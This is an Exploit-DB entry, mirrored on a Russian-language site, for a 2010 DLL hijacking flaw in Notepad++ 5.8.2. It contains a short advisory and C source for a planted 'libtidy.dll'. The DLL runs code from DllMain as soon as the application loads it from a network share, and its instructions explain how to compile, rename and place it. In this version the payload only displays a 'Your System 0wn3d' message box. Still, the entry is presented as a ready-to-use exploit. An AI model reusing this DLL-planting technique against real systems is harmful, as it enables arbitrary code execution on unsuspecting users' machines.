- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 34836
- Проверка EDB
-
- Пройдено
- Автор
- ANT!-TR0J4N
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2010-10-12
Notepad++ 5.8.2 - 'libtidy.dll' DLL Loading Arbitrary Code Execution
Код:
source: https://www.securityfocus.com/bid/44052/info
Notepad++ is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
Notepad++ 5.8.2 is vulnerable; other versions may also be affected.
/*
#Notepad++ 5.8.2 DLL Hijacking Exploit (libtidy.dll)
#Author : anT!-Tr0J4n
#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends
#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
#Software : http://notepad-plus-plus.org/
#Tested on: Windows? XP sp3
#Home : www.Dev-PoinT.com
==========================
How TO use : Compile and rename to libtidy.dll , create a file in the same dir with one of the following extensions.
check the result > Hack3d
==========================
# libtidy.dll(code)
*/
#include "stdafx.h"
void init() {
MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "anT!-Tr0J4n",0x00000003);
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
- Источник
- www.exploit-db.com